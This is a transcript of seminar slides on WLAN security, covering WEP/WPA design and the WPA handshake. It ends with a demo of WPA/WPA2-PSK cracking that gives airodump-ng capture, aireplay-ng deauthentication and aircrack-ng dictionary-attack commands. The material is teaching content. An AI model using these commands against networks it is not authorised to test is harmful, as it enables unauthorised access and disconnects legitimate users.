Wireless Security null seminar
-
Upload
nilesh-sapariya -
Category
Engineering
-
view
316 -
download
7
description
Transcript of Wireless Security null seminar
![Page 1: Wireless Security null seminar](https://reader035.fdocuments.net/reader035/viewer/2022062220/55757a23d8b42adb7e8b4b26/html5/thumbnails/1.jpg)
Wireless Security
Nilesh Sapariya CEH v8 , CCNA
Security Engineer
About me :
![Page 2: Wireless Security null seminar](https://reader035.fdocuments.net/reader035/viewer/2022062220/55757a23d8b42adb7e8b4b26/html5/thumbnails/2.jpg)
Agenda
1) Introduction to WLAN Security
2) WLAN Architectures
3) WPA / WPA2 PSK (Personal) Cracking
![Page 3: Wireless Security null seminar](https://reader035.fdocuments.net/reader035/viewer/2022062220/55757a23d8b42adb7e8b4b26/html5/thumbnails/3.jpg)
WLAN
1 ) In computing, Wireless LAN or Wireless Local Area Network is a term to refer to a Local Area Network that does not need cables to connect the different devices.
2) Instead, radio wave are used to communicate
![Page 4: Wireless Security null seminar](https://reader035.fdocuments.net/reader035/viewer/2022062220/55757a23d8b42adb7e8b4b26/html5/thumbnails/4.jpg)
From Fixed Device to Mobile Device
![Page 5: Wireless Security null seminar](https://reader035.fdocuments.net/reader035/viewer/2022062220/55757a23d8b42adb7e8b4b26/html5/thumbnails/5.jpg)
These Device’s don’t have LAN Port
![Page 6: Wireless Security null seminar](https://reader035.fdocuments.net/reader035/viewer/2022062220/55757a23d8b42adb7e8b4b26/html5/thumbnails/6.jpg)
Only and Best Mode of Connectivity
![Page 7: Wireless Security null seminar](https://reader035.fdocuments.net/reader035/viewer/2022062220/55757a23d8b42adb7e8b4b26/html5/thumbnails/7.jpg)
V VVV V V
V VVV V V
D D D D
D D D OO
O O
Wireless is a more efficient, many-to-one access method
AP
O
“Right-sized” Edge (One port supports multiple users and devices simultaneously)
With Wi-Fi Ports Can Be Easily Cut In Half
7
L
12 VOIP phones7 Desktop PC’s5 Laptop PCs
1 Wireless AP (mobile devices, guests, etc.)
6 Conference room & public area ports5 Other devices (printer, copier, fax, etc.)12 Ports (reserved for future use)
D
V
F
O
C
AP
V VVV V V
V VVV V V
D D D D
D D D
AP
OO
O O F F FFFF
F F FFFF
L L L LL
C C C C C CO
Existing Wired Network Edge (1:1 ratio of ports to devices)
Representative 12-person Workgroup
![Page 8: Wireless Security null seminar](https://reader035.fdocuments.net/reader035/viewer/2022062220/55757a23d8b42adb7e8b4b26/html5/thumbnails/8.jpg)
Wi-Fi Comes Problem
Challenging Wi-Fi
Environment
Client DensityAnd
Diversity Challenges
Security againstUncontrolled Wireless
Devices and Infrastructure attacks
RF Noise Metal Objects with Wheels
Building Materials
![Page 9: Wireless Security null seminar](https://reader035.fdocuments.net/reader035/viewer/2022062220/55757a23d8b42adb7e8b4b26/html5/thumbnails/9.jpg)
Security Risk
Uncontrolled Wireless Devices• Rogue APs• Laptops acting as bridges• Misconfigured WLAN Settings on laptops• Ad-Hoc networks
Attacks against WLAN infrastructure• Denial of Service/flooding• Man-in-the-Middle• WEP (Wired Equivalent Privacy ) cracking (aircrack-ng –
famous tool)• WPA/WPA2 ( Wireless protected access ) cracking
(aircrack-ng – famous tool)
![Page 10: Wireless Security null seminar](https://reader035.fdocuments.net/reader035/viewer/2022062220/55757a23d8b42adb7e8b4b26/html5/thumbnails/10.jpg)
Security Risk
Ad HocAccess Point MAC
Spoofing
?
Server
Rogue User
Mis-configured Access Point
Office
And More such kind of Attacks
![Page 11: Wireless Security null seminar](https://reader035.fdocuments.net/reader035/viewer/2022062220/55757a23d8b42adb7e8b4b26/html5/thumbnails/11.jpg)
Wireless Standards - 802.11a, 802.11b/g/n, and 802.11ac
• 1997 IEEE ( Institute of Electrical and Electronics Engineering ) created First WLAN
• Called as 802.11 • 802.11 only supports max network BW = 2
Mbps (to slow for most of application )
![Page 12: Wireless Security null seminar](https://reader035.fdocuments.net/reader035/viewer/2022062220/55757a23d8b42adb7e8b4b26/html5/thumbnails/12.jpg)
WLAN Operation
• Wireless LAN (WLAN) Can operate in 2 different frequency ranges
• 2.4GHz (802.11 b/g/n ) • 4.9 or 5GHz (802.11 a/h/j/n)• Note : your wireless card can only be on one
channel ( it has single radio ) • Every country has allowed channel ,users and
maximum power levels
![Page 13: Wireless Security null seminar](https://reader035.fdocuments.net/reader035/viewer/2022062220/55757a23d8b42adb7e8b4b26/html5/thumbnails/13.jpg)
• Fair distribution of clients across channels
• eg. Channel 1, 6, 11
• Fair distribution of clients across bands
• eg. 2.4-GHz and 5-GHz
Channel 11
Channel 6
Channel 1
![Page 14: Wireless Security null seminar](https://reader035.fdocuments.net/reader035/viewer/2022062220/55757a23d8b42adb7e8b4b26/html5/thumbnails/14.jpg)
WLAN Setup
802.11a/b/g/n
Antennas
Policy
Mobility
Forwarding
Encryption
Authentication
Management
“Fat” Access Point”
Centralized Management Centralized Security
“Thin” Access Points
Policy
Mobility
Forwarding
Encryption
Authentication
Management
802.11a/b/g/n
Antennas
Many devices to manage Many entry points to secure
Centralized Mobility Controller
![Page 15: Wireless Security null seminar](https://reader035.fdocuments.net/reader035/viewer/2022062220/55757a23d8b42adb7e8b4b26/html5/thumbnails/15.jpg)
Wardriving
• How to find SSID in your area • How to find hidden SSID • Tools used :-i. inSSIDerii. Common view for wifi
![Page 16: Wireless Security null seminar](https://reader035.fdocuments.net/reader035/viewer/2022062220/55757a23d8b42adb7e8b4b26/html5/thumbnails/16.jpg)
Understanding WPA / WPA2 (Wi-Fi Protected Access )
![Page 17: Wireless Security null seminar](https://reader035.fdocuments.net/reader035/viewer/2022062220/55757a23d8b42adb7e8b4b26/html5/thumbnails/17.jpg)
Wireless Encryption
• The main source of vulnerability associated with wireless networks are the methods of encryption. There are a few different type of wireless encryption including:
• WEP• WPA• WPA2
![Page 18: Wireless Security null seminar](https://reader035.fdocuments.net/reader035/viewer/2022062220/55757a23d8b42adb7e8b4b26/html5/thumbnails/18.jpg)
WEP
• Stands for Wired Equivalent Privacy.• WEP is recognizable by the key of 10 or
26 hexadecimal digits.
![Page 19: Wireless Security null seminar](https://reader035.fdocuments.net/reader035/viewer/2022062220/55757a23d8b42adb7e8b4b26/html5/thumbnails/19.jpg)
WPA or WPA2
• Stands for Wi-Fi Protected Access• Created to provide stronger security• Still able to be cracked if a short password is
used. • If a long passphrase or password is used, these
protocol are virtually not crackable.• WPA-PSK and TKIP or AES use a Pre-Shared
Key (PSK) that is more than 7 and less than 64 characters in length.
![Page 20: Wireless Security null seminar](https://reader035.fdocuments.net/reader035/viewer/2022062220/55757a23d8b42adb7e8b4b26/html5/thumbnails/20.jpg)
Why WPA ?
WEP (Wired Equivalent Privacy )broken beyond repair
if you are using 64 bit or 128 bit key WEP will be broken
![Page 21: Wireless Security null seminar](https://reader035.fdocuments.net/reader035/viewer/2022062220/55757a23d8b42adb7e8b4b26/html5/thumbnails/21.jpg)
Weaknesses of WEP
1. Poor key management
• WEP uses same key for authentication/encryption• Provides no mechanism for session key refreshing• Static Key encryption used
2. One-way authentication
![Page 22: Wireless Security null seminar](https://reader035.fdocuments.net/reader035/viewer/2022062220/55757a23d8b42adb7e8b4b26/html5/thumbnails/22.jpg)
WEP Replacement
Long Term Solution Use CCMP ( Counter Mode Cipher
Block Chaining Message Authentication Code Protocol )
Based on AES Hardware Change Require
Personal Enterprise Personal Enterprise
Intermediate solution by Wifi-Alliance
Use TKIP (Temporal Key Integrity Protocol )
Based on WEP Hardware change not required Firmware update
PSK PSK802.1x + Radius 802.1x + Radius
WPA WPA2
![Page 23: Wireless Security null seminar](https://reader035.fdocuments.net/reader035/viewer/2022062220/55757a23d8b42adb7e8b4b26/html5/thumbnails/23.jpg)
Difference between WPA-Personal & WPA-Enterprise
Wireless Architecture How to create profile for WPA-
Personal and WPA-Enterprise
![Page 24: Wireless Security null seminar](https://reader035.fdocuments.net/reader035/viewer/2022062220/55757a23d8b42adb7e8b4b26/html5/thumbnails/24.jpg)
WEP :Static Key Encryption
Static WEP Key
Static WEP Key
Probe Request-Response
Authentication RR , Association RR
Data Encrypted with Key
![Page 25: Wireless Security null seminar](https://reader035.fdocuments.net/reader035/viewer/2022062220/55757a23d8b42adb7e8b4b26/html5/thumbnails/25.jpg)
WPA :Non Static Key
Static WEP Key
Static WEP Key
Probe request response
Authentication , Association
Dynamic Key Generated First
Data Encrypted with Dynamic Key
How are dynamic keys Created ?
![Page 26: Wireless Security null seminar](https://reader035.fdocuments.net/reader035/viewer/2022062220/55757a23d8b42adb7e8b4b26/html5/thumbnails/26.jpg)
WPA / WPA2 PSK(Personal) Cracking
![Page 27: Wireless Security null seminar](https://reader035.fdocuments.net/reader035/viewer/2022062220/55757a23d8b42adb7e8b4b26/html5/thumbnails/27.jpg)
WPA Pre-shared Key
Passphrase (8-63 )
PBKDF2
Pre-Shared Key 256 bit
Passphrase (8-63 )
PBKDF2
Pre-Shared Key 256 bit
![Page 28: Wireless Security null seminar](https://reader035.fdocuments.net/reader035/viewer/2022062220/55757a23d8b42adb7e8b4b26/html5/thumbnails/28.jpg)
PBKDF2
• Password Based Key Derivation Function • RFC 2898 • PBKDF2 (Passphrase, SSID,ssidLen,4096,256 )• 4096 - Number of times the passphrase is
hashed • 256 - Intended Key Length of PSK
![Page 29: Wireless Security null seminar](https://reader035.fdocuments.net/reader035/viewer/2022062220/55757a23d8b42adb7e8b4b26/html5/thumbnails/29.jpg)
How does the Client know ?
• Beacon Frames ?• Probe Response Packets from the AP ? • Can be used to create a WPA/WPA2 Honeypot
as well!
![Page 30: Wireless Security null seminar](https://reader035.fdocuments.net/reader035/viewer/2022062220/55757a23d8b42adb7e8b4b26/html5/thumbnails/30.jpg)
How WEP Works
1) We try to collect large number of data packets
2) Bunch of large data packet contains weak IV 3) We Run it with the algorithm or aircrak-ng
and get the key
Then how to crack WPA-PSK ?
![Page 31: Wireless Security null seminar](https://reader035.fdocuments.net/reader035/viewer/2022062220/55757a23d8b42adb7e8b4b26/html5/thumbnails/31.jpg)
Lets “ Shake the hand” #4-way Handshake Probe Request Response
Authentication RR, Association RR Supplicant Authenticator
Pre-Shared Key 256 bit Pre-Shared Key 256 bit
Message 1
ANounce ANounce
PTK
SNounce
Message 2Snounce
PTK
Message 3
Key Installation Key Installed
Message 4Key Install Acknowledgement
+ MIC
Key Installed
![Page 32: Wireless Security null seminar](https://reader035.fdocuments.net/reader035/viewer/2022062220/55757a23d8b42adb7e8b4b26/html5/thumbnails/32.jpg)
Pairwise Transient Key
• PTK = Function (PTK ,ANounce, SNounce, Authenticator MAC ,Supplicant MAC )
PMK= Pre-Shared Key (Pairwise master Key) ANounce = Random by AP SNounce = Random by Client Authentication MAC = AP MAC Supplicant MAC = Client MAC MIC – Message Integrity Check ( Signature Algorithm )
![Page 33: Wireless Security null seminar](https://reader035.fdocuments.net/reader035/viewer/2022062220/55757a23d8b42adb7e8b4b26/html5/thumbnails/33.jpg)
WPA Working: Block Diagram
Passphrase (8-63 )
PBKDF2
Pre-Shared Key 256 bit
4 Way Handshake
SNonceAnonceAP MAC
Client MAC
PTK
![Page 34: Wireless Security null seminar](https://reader035.fdocuments.net/reader035/viewer/2022062220/55757a23d8b42adb7e8b4b26/html5/thumbnails/34.jpg)
WPA-PSK Susceptible to Dictionary Attack
![Page 35: Wireless Security null seminar](https://reader035.fdocuments.net/reader035/viewer/2022062220/55757a23d8b42adb7e8b4b26/html5/thumbnails/35.jpg)
WPA / WPA2 PSK(Personal) Cracking
DEMO
![Page 36: Wireless Security null seminar](https://reader035.fdocuments.net/reader035/viewer/2022062220/55757a23d8b42adb7e8b4b26/html5/thumbnails/36.jpg)
External Wireless Card
• Alfa Networks AWUS036H USB based card
• Already integrated with Backtrack and Kali
• Allows for packet sniffing • Allows for packet injection• We will use this in our
Demo session
![Page 37: Wireless Security null seminar](https://reader035.fdocuments.net/reader035/viewer/2022062220/55757a23d8b42adb7e8b4b26/html5/thumbnails/37.jpg)
Software Setup
• Run Kali Linux on VM machine • Connecting Alfa Adapter
![Page 38: Wireless Security null seminar](https://reader035.fdocuments.net/reader035/viewer/2022062220/55757a23d8b42adb7e8b4b26/html5/thumbnails/38.jpg)
Understanding Wireless Sniffing
• Wireless : Monitor mode • When you put card in monitor mode then it will
accept all the packet it is seeing in the current channel
• Inbuilt tool in Kali which helps in quickly put card into monitoring mode and sniff the packets
• Will use Tool name : airmon-ng to put card in to monitor mode ( part of aircrack sweet of tools )
![Page 39: Wireless Security null seminar](https://reader035.fdocuments.net/reader035/viewer/2022062220/55757a23d8b42adb7e8b4b26/html5/thumbnails/39.jpg)
Some Basic Terms
• MAC address or physical address is a unique identifier assigned to network interfaces for communications
• Access point >> Wireless router
• SSID (service set identifier) >> Network Name
• BSSID (basic service set identification ) >> MAC address of the access point
![Page 40: Wireless Security null seminar](https://reader035.fdocuments.net/reader035/viewer/2022062220/55757a23d8b42adb7e8b4b26/html5/thumbnails/40.jpg)
Using KaliLinux or BT
• Some Basic Backtrack Terms >>• Wlan0 – wireless interface• Mon0 – monitor mode• Handshake :-refers to the negotiation process between
the computer and a WiFi server using WPA encryption. Needed to crack WPA/WPA2.
• Dictionary - consisting the list of common passowords.• .cap file – used to store packets.
![Page 41: Wireless Security null seminar](https://reader035.fdocuments.net/reader035/viewer/2022062220/55757a23d8b42adb7e8b4b26/html5/thumbnails/41.jpg)
Tools Used
• Airmon-ng >> Placing different cards in monitor mode
Airodump-ng (Packet snniffer ) >> Tool used to listen to wireless routers in the area.
Aireplay-ng ( Packet injector ) >> Aireplay-ng is used to inject frames. – The primary function is to generate traffic for the
later use in aircrack-ng for cracking the WEP and WPA-PSK keys.
• Aircrack-ng >> Cracks WEP and WPA (Dictionary attack) keys.
![Page 42: Wireless Security null seminar](https://reader035.fdocuments.net/reader035/viewer/2022062220/55757a23d8b42adb7e8b4b26/html5/thumbnails/42.jpg)
Lets Hack
![Page 43: Wireless Security null seminar](https://reader035.fdocuments.net/reader035/viewer/2022062220/55757a23d8b42adb7e8b4b26/html5/thumbnails/43.jpg)
Lets Start
This will list all of the wireless cards that support monitor (not injection) mode.
The “(monitor mode enabled)” message means that the card has successfully been put into monitor mode. Note the name of the new monitor interface, mine is mon0.
![Page 44: Wireless Security null seminar](https://reader035.fdocuments.net/reader035/viewer/2022062220/55757a23d8b42adb7e8b4b26/html5/thumbnails/44.jpg)
• Airodump will now list all of the wireless networks in your area.
![Page 45: Wireless Security null seminar](https://reader035.fdocuments.net/reader035/viewer/2022062220/55757a23d8b42adb7e8b4b26/html5/thumbnails/45.jpg)
• airodump-ng –c [channel] –bssid [bssid] –w /root/Desktop/ [monitor interface]Replace [channel] with the channel of your target network. Paste the network BSSID where [bssid] is, and replace [monitor interface] with the name of your monitor-enabled interface, (mon0).
![Page 46: Wireless Security null seminar](https://reader035.fdocuments.net/reader035/viewer/2022062220/55757a23d8b42adb7e8b4b26/html5/thumbnails/46.jpg)
• Airodump with now monitor only the target network, allowing us to capture more specific information about it.
NOTE : • What we’re really doing now is
waiting for a device to connect or reconnect to the network, forcing the router to send out the four-way handshake that we need to capture in order to crack the password.
![Page 47: Wireless Security null seminar](https://reader035.fdocuments.net/reader035/viewer/2022062220/55757a23d8b42adb7e8b4b26/html5/thumbnails/47.jpg)
aireplay-ng –0 2 –a [router bssid] –c [client bssid] mon0
![Page 48: Wireless Security null seminar](https://reader035.fdocuments.net/reader035/viewer/2022062220/55757a23d8b42adb7e8b4b26/html5/thumbnails/48.jpg)
Upon hitting Enter, you’ll see aireplay-ng send the packets, and within moments, you should see this message appear on the airodump-ng screen!
![Page 49: Wireless Security null seminar](https://reader035.fdocuments.net/reader035/viewer/2022062220/55757a23d8b42adb7e8b4b26/html5/thumbnails/49.jpg)
Final Step
• aircrack-ng -a2 -b [router bssid] -w [path to wordlist] /root/Desktop/*.cap
• -a is the method aircrack will use to crack the handshake, 2=WPA method.-b stands for bssid, replace [router bssid] with the BSSID of the target router, mine is 00:14:BF:E0:E8:D5.-w stands for wordlist, replace [path to wordlist] with the path to a wordlist that you have downloaded. I have a wordlist called “wpa.txt” in the root folder./root/Desktop/*.cap is the path to the .cap file containing the password
![Page 50: Wireless Security null seminar](https://reader035.fdocuments.net/reader035/viewer/2022062220/55757a23d8b42adb7e8b4b26/html5/thumbnails/50.jpg)
If the phrase is in the wordlist, then aircrack-ng will show it too you like this